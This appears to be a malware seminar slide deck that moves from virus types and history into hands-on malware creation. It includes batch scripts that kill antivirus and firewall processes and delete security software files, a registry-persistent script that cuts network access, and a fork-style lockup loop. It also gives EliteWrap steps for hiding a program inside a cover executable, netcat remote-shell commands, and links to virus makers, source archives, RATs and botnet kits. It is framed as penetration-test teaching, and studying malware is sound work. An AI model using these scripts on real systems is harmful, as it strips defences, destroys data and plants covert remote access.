Malware SeminarWITH CHUCK EASTTOM

About the Speaker 19 Books

32 industry certifications

2 Masters degrees

6 Computer science related patents

Over 20 years experience, over 15 years teaching/training

Helped create CompTIA Security+, Linux+, Server+. Helped revise CEH v8

Frequent consultant/expert witness

www.chuckeasttom.com

chuck@chuckeasttom.com

Get the software for this class at

http://www.chuckeasttom.com/MalwareClassKit.zip

IMPORTANT In this lesson you will learn to execute certain attacks. It is

important that you understand that doing so on any computer other than a test system or a system you have permission to attack is a serious crime.

This is for you to learn techniques for penetration testing, and to understand the techniques criminals use.

I repeat: MISUSING WHAT IS IN THIS LESSON IS A SERIOUS CRIME.

Why learn it then?

There are several reasons: Understanding malware helps to combat it.

It is possible to use innocuous ‘malware’ as part of a penetration test. This must only be done with great care and when the malware in question is

Completely innocuous

Not particularly viral (i.e. does not spread easily)

Malware is a primary weapon in cyber warfare and students in this class may be employed by government agencies.

Malware

Virus

Worms

Spyware

Logic Bomb

Rootkit

Annoyances Browser Hijacker

Scareware

Adware

Pornware

The mechanics of a virus• Delivery

a. Via email

b. Copying over a network

c. Direct communication with exposed ports.

• Payload

• Types• Multipartite

• Boot sector

• Stealth

• Armored

• Encryption

• Polymorphic/Metamorphic

Virus Types

Armored Virus

An armored virus uses techniques that make it hard to analyze. Code confusion is one such method. The code is written such that if the virus is disassembled, the code won’t be easily followed. Compressed code is another method for armoring the virus.

Virus Types Continued Sparse Infection Virus

A sparse infection virus will only be active intermittently and for short periods. This makes it much harder to detect. The virus is dormant much of the time and only causes whatever malicious actions it has sporadically. If it is well written, it will only infect at random intervals, not at regular intervals. The intermittent nature of the attack is what makes them so difficult for anti virus to detect. For example the virus may not be active when a virus can is run.

In some cases the sparse infector targets a specific program but the virus only executes every 10th time or 20th time that target program executes. Or a sparse infector may have a burst of activity, then lay dormant for a period of time. There are a number of variations on the theme, but the basic principle is the same: to reduce the frequency of attack and thus reduce the chances for detection.

Virus Types Continued

A macro virus is written into a macro in some business application. For example, Microsoft Office allows users to write macros to automate some tasks. Microsoft Outlook is designed so that a programmer can write scripts using a subset of the Visual Basic programming language, called Visual Basic for Applications (VBA). This scripting language is, in fact, built into all Microsoft Office products. Programmers can also use the closely related VBScript language. Both languages are quite easy to learn. If such a script is attached to an e-mail and the recipient is using Outlook, then the script can execute. That execution can do any number of things, including scanning the address book, looking for addresses, sending out e-mail, deleting e-mail, and more.

Encrypted virus

Either to armor or as ransomware

To use encryption the malware needs at least three components: The actual malware code (which is encrypted).

A module to perform encryption/decryption.

A key.

One of the most widely known examples is the infamous CryptoLocker. It was first discovered in 2013. CryptoLocker utilized asymmetric encryption to lock the user’s files. Several varieties of CryptoLocker have been detected.

Virus Types Continued

A multipartite virus attacks your system in multiple ways, but usually infects the boot sector as well as some other portion of the system. File infection viruses are made to infect some file on the computer, and they spread when the user runs the infected file. Boot sector viruses run when the computer boots up. A multipartite virus does both. For example, a multipartite virus might affect the boot sector and make changes to a specific file or the Windows registry.

Virus Types Continued

More sophisticated IDSs look for common shellcode signatures. But even these systems can be bypassed, by using polymorphic shellcode. One simple technique virus writers use is to encrypt the shellcode by XORing values over the shellcode ,using loader code to decrypt the shellcode, and then executing the decrypted shellcode

Ransomeware

One of the most widely known examples is the infamous CryptoLocker. It was first discovered in 2013. CryptoLocker utilized asymmetric encryption to lock the user’s files. Several varieties of CryptoLocker have been detected.

CryptoWall is a variant of CryptoLocker first found in August of 2014. It looked and behaved much like CryptoLocker. In addition to encrypting sensitive files it would communicate with a command and control server, and even take a screenshot of the infected machine. By March of 2015 a variation of CryptoWall had been discovered which is bundled with the spyware TSPY_FAREIT.YOI and actually steals credentials from the infected system, in addition to holding files for ransom.

History of Viruses

The next few slides give you a history of viruses. This is not on the test. But it helps to give you a context, understanding how viruses have developed will allow you to better understand how they function.

14

History of Viruses

1981 Apple Viruses 1, 2, and 3 are some of the first viruses "in the wild" or public domain. Found on the Apple II operating system, the viruses spread through Texas A&M via pirated computer games.

1980’s In the early 1980s, Fred Cohen did extensive theoretical research, as well as setting up and performing numerous practical experiments, regarding viral type programs. His dissertation was presented in 1986 as part of the requirements for a doctorate in electrical engineering from the University of Southern California. This work is foundational, and any serious student of viral programs disregards it at his own risk Dr. Cohen's definition of a computer virus as "a program that can 'infect' other programs by modifying them to include a ... version of itself"

1987 In November, the Lehigh virus was discovered at Lehigh University in the U.S. It was the first "memory resident file infector". A file-infecting virus attacks executable files. It gets control when the file is opened. The Lehigh virus attacked a file called COMMAND.COM. When the file was run (usually by booting from an infected disk), the virus stayed in the resident memory.

15

History of Viruses Continued

1988 In March, the first anti-virus software was written. It was designed to detect and remove the Brain virus and immunized disks against Brain infection.

1990 Viruses combining various characteristics spring up. They included Polymorphism (involves encrypted viruses where the decryption routine code is variable), Armoring (used to prevent anti-virus researchers from dissembling a virus) and Multipartite (can infect both programs and boot sectors).

1991 Symantec releases Norton Anti-Virus software.

16

History of Viruses Continued

1992 Media mayhem greeted the virus Michaelangelo in March. Predictions of massive disruptions were made and anti-virus software sales soared. As it turned out, the cases of the virus were far and few between.

1994 A virus called Kaos4 was posted on a pornography news group file. It was encoded as text and downloaded by a number of users.

1996 Concept, a macro-virus, becomes the most common virus in the world.

17

History of Viruses Continued

1999 The Melissa virus, a macro, appears. It uses Microsoft Word to infect computers and is passed on to others through Microsoft Outlook and Outlook Express e-mail programs.

2000 The "I Love You Virus" wreaks havoc around the world. It is transmitted by e-mail and when opened, is automatically sent to everyone in the user's address book

July 2001: The Code Red worm infects tens of thousands of systems running Microsoft Windows NT and Windows 2000 server software, causing an estimated $2 billion in damages. The worm is programmed to use the power of all infected machines against the White House Web site at a predetermined date. In an ad hoc partnership with virus hunters and technology companies, the White House deciphers the virus's code and blocks traffic as the worm begins its attack.

18

History of Viruses Continued

2002: Melissa virus author David L. Smith, 33, is sentenced to 20 months in federal prison.

Jan. 2003: The "Slammer" worm infects hundreds of thousands of computers in less than three hours. The fastest-spreading worm ever wreaks havoc on businesses worldwide, knocking cash machines offline and delaying airline flights.

2004: The "MyDoom" worm becomes the fastest-spreading e-mail worm as it causes headaches -- but very little damage -- almost a year to the day after Slammer ran rampant in late January 2003. MyDoom uses "social engineering," or low-tech psychological tricks, to persuade people to open the e-mail attachment that contains the virus. It claims to be a notification that an e-mail message sent earlier has failed, and prompts the user to open the attachment to see what the message text originally said. Many people fall for it.

19

Mac DefenderThis virus is very interesting for multiple reasons. First because it specifically targets Macintosh computers. Most experts have long agreed that Apple products remained relatively virus free simply because their products did not have enough market share to attract the attention of virus writers. It has long been suspected that if Apple garnered a greater market share, they would also begin to get more virus attacks. That has proven to be true.

This virus was first seen in the early months of 2011. It is embedded in some web pages and when a user visits those web pages, he or she is given a fake virus scan that tells the user that they have a virus and it needs to be fixed. The “fix” is actually downloading a virus. The point of the virus is to get end users to purchase the MacDefender “antivirus” product. This is the second reason this case is noteworthy. Fake antivirus attacks, also known as scareware, have been becoming increasingly common.

20

FakeAV 

This virus first appeared in July 2012. It affected Windows systems ranging from Windows 95 to Windows 7 and Windows server 2003. This was a fake anti-virus (thus the name FakeAV). It would popup fake virus warnings. This was not the first such fake anti-virus malware, but it was one of the more recent ones.

Symantec FakeAV http://www.symantec.com/security_response/writeup.jsp?docid=2012-073004-1749-99&tabid=2

21

Levels of virus creation skill

From least skilled to most skilled:

1.Use a GUI tool

2.Use a batch file virus or simple macro virus

3.Alter existing virus code

4.Write your own from scratch

5.Write your own from scratch that is a stealthy and self destructs.

Making a Virus Terabit Virus Maker

http://www.mediafire.com/?dwdqtmmtzh2 JPS Virus Maker http://vx.netlux.org/vx.php?id=tj04 Internet Worm Maker Thing

http://vx.netlux.org/vx.php?id=ti06 Source code for various viruses http://vxheaven.org/src.php Online virus writing resource http://

www.sourcecodesworld.com/source/BrowseCategory.asp?CatId=52

I love you virus source code http://www.cexx.org/loveletter.htm Melissa Source code http://www.cs.miami.edu/~burt/learning/Csc521.061/

notes/melissa.txt

Tools

There are a variety of virus/Trojan/worm creation tools.

One very good website is vxheaven.org

You will also see some on the following slides

Terabit Virus Maker

Simple VBS virus

Great for penetration testing:

Dim msg, sapi

msg="You have violated security policies"

Set sapi=CreateObject("sapi.spvoice")

sapi.Speak msg

Disable the internet (must be a bat file) echo @echo off>c:windowswimn32.bat

echo break off>>c:windowswimn32.bat

echo ipconfig/release_all>>c:windowswimn32.bat

echo end>>c:windowswimn32.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f

echo You Have Been HACKED!

PAUSE

Endless loop script

@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top

You can use notepad, calc, anything you like. But it keeps launching copies until the system is locked up.

Batch file virus Turns off target security @ echo off

rem --

rem Permanently Kill Anti-Virus

net stop “Security Center”

netsh firewall set opmode mode=disable

tskill /A av*

tskill /A fire*

tskill /A anti*

tskill /A mcafe*

tskill /A panda*

tskill /A PersFw

tskill /A KAV*

tskill /A ZONEALARM

del /Q /F C:\Program Files\alwils~1\avast4\*.*

del /Q /F C:\Program Files\Norton~1\*.cnt

del /Q /F C:\Program Files\Mcafee\*.*

del /Q /F C:\Program Files\kaspersky\*.*

This uses basicCommand line tools•Tskill kills tasks•Del deletes files and directories•The del flags are

• /F Ignore read-only setting and delete anyway (FORCE)

• /Q Quiet mode, do not give a Yes/No Prompt before deleting

• /S Delete from all Subfolders (DELTREE)

Using the powershell

Set wshShell = wscript.CreateObject(”WScript.Shell”)dowscript.sleep 100wshshell.sendkeys “~(enter)”loop

Keeps pressing the enter key every 100 milliseconds, You can replace with any other key.

Virus Writing Techniques

WMIC

Spyware with GINA.dll

wmic

The Windows Management Instrumentation Command-line (WMIC). It can be scripted

https://msdn.microsoft.com/en-us/library/aa394531(v=vs.85).aspx

https://msdn.microsoft.com/en-us/library/bb742610.aspx

wmic

wmic diskdrive list

wmic

wmic useraccount list

Spyware creation techniques Microsoft Graphical Identification and Authentication Dynamic

Link Library (MSGINA DLL). It is loaded by the Winlogon executable during login. It allows third party customizations of the login by loading their own DLL between WinLogon and GINA.dll

https://msdn.microsoft.com/en-us/library/bb742447.aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/aa380543(v=vs.85).aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/aa374744(v=vs.85).aspx

Here is where you find such a dll IF it exists

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDLL

This would be advanced spyware and not common

Spyware continued

There can be legitimate third party modifications to gina.dll such as these:

Determine the domain C++ code that determines the domain

Self-Destruct C++ code that self destructs

Trojan Horse Tools

EliteWrapper ADS

using Alternate Data Streams Attach a file to a text

type notepad.exe > ADSFile.txt:notepad.exe

Attach a script to a file type somescript.vbs> ADSFile.txt:somescript.vbs

Brief tutorial http://synjunkie.blogspot.com/2007/11/using-and-abusing-alternate-data.html

Using EliteWrap You will have to temporarily turn off your anti virus then download elitewrap

from https://packetstormsecurity.com/files/download/14593/elitewrap.zip Enter the file you want to run that is visible Enter operation

1 - Pack only

2 - Pack and execute, visible, asynchronously

3 - Pack and execute, hidden, asynchronously

4 - Pack and execute, visible, synchronously

5 - Pack and execute, hidden, synchronously

6 - Execute only, visible, asynchronously

7 - Execute only, hidden, asynchronously

8 - Execute only, visible, synchronously

9 - Execute only, hidden, synchronously

Enter command line

Enter Second file (the item you are surreptitiously installing.

Enter operation

When done with files, press enter

EliteWrap Example

EliteWrap continued

Note the file size. The text.exe is only slightly bigger than the other file. If you pack them.

EliteWrap continued

More importantly when you run elitetest.exe you only see calculator running, you don’t see the second program. But it clearly is loaded and running. And stays loaded after the original cover program (calc.exe) is closed.

Using netcat

Attach netcat to some other tool using any wrapper (like elitewrap)

Have it run nc -l –p 80

You have just opened a reverse shell on the infected machine.

Netcat cheat sheet from SANS

http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf

Basic Video Tutorial

Basic Netcat commands

Receiving files nc -l 1001> received_file

Command shell nc -l -p 1001-e cmd.exe

Connect to that shell nc --ssl 192.168.1.10 1001

Other Trojan & Related Tools

RemoteByMail Take control of a target machine remotely via email http://www.runtime.org/remotebymail.htm

Dark Comet RAT: Take control of a machine remotely http://www.darkcomet-rat.com/

RAT is Remote Access Trojan

Botnets

Groups of computers that are unaware they are being used as attackers. They are referred to as zombies.

There are tools for creating and managing botnets Poison Ivy http://www.poisonivy-rat.com/index.php?

link=download Illusions Zeus

Now more in depth

Screen capture spyware Code is in class handout in C# complete working

code

Capture email data

Send emails